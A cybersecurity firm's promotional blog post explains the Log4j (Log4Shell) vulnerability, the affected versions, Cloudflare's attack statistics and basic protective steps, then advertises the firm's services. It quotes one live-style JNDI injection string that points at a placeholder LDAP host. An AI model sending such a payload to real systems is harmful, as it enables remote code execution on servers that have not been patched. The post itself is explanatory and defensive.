What is Apache Log4j?
Log4j is an open-source Java library used widely by Java developers to log errors with code easily. Log4j is widely used in many applications and is present in many services as a dependency, meaning other libraries rely on it.
About the vulnerability
Identified on December 9th, this vulnerability scored a 10/10 on the CVSS rating system, indicative of the severity of the issue. This exploit posed a serious threat to many applications and services, including Amazon, Apple iCloud, Cloudflare, Tesla and Twitter, which all use the Log4j library (Kaspersky, 2021). Cloudflare reported an increase in blocked attacks, with the largest peak at 6 pm UTC on December 12th, just three days after the vulnerability was identified. Cloudflare stated that they were blocking around 20,000 blocked exploit requests per minute. When we look at the number of IP addresses which the Web Application Firewall (WAF) was blocking, 200-400 IPs appear to be actively scanning at any given time, but the largest number of scans or exploitation attempts were coming from Canada and then the United States. The United Kingdom was 5th behind France and the Netherlands. Cloudflare also reported that many of these blocked requests were in the form of reconnaissance, where the exploiting user was checking to see if the server was exploitable. The top blocked exploit string was “${jndi:ldap://x.x.x.x/#Touch}”. It was also found that someone had tried to pretend to be the Googlebot.
Which versions were affected?
Starting from 2.0-beta9 to 2.14.1, almost all versions of Log4j are severely vulnerable. Luckily, Apache was quick to release a solution with 2.15.0 becoming available on December 10th, just 1 day after the vulnerability was identified.
How can you protect your servers from attack?
1. Identify which applications use Log4j and update to 2.15.0 immediately.
2. Risk Management to identify, analyse, evaluate and address further risks to your servers.
3. Identity and Access Management to ensure the right users have the appropriate permissions across your network.
4. Security Operations Centre (SOC) to maintain round-the-clock threat intelligence, detection and response services.
Protect your business from falling victim to severe attacks such as the Log4j vulnerability today by investing in Gemraj Technologies Ltd’s industry-leading cybersecurity services.
Contact us by emailing sales@gemrajtechs.com or call us on 0800 051 7679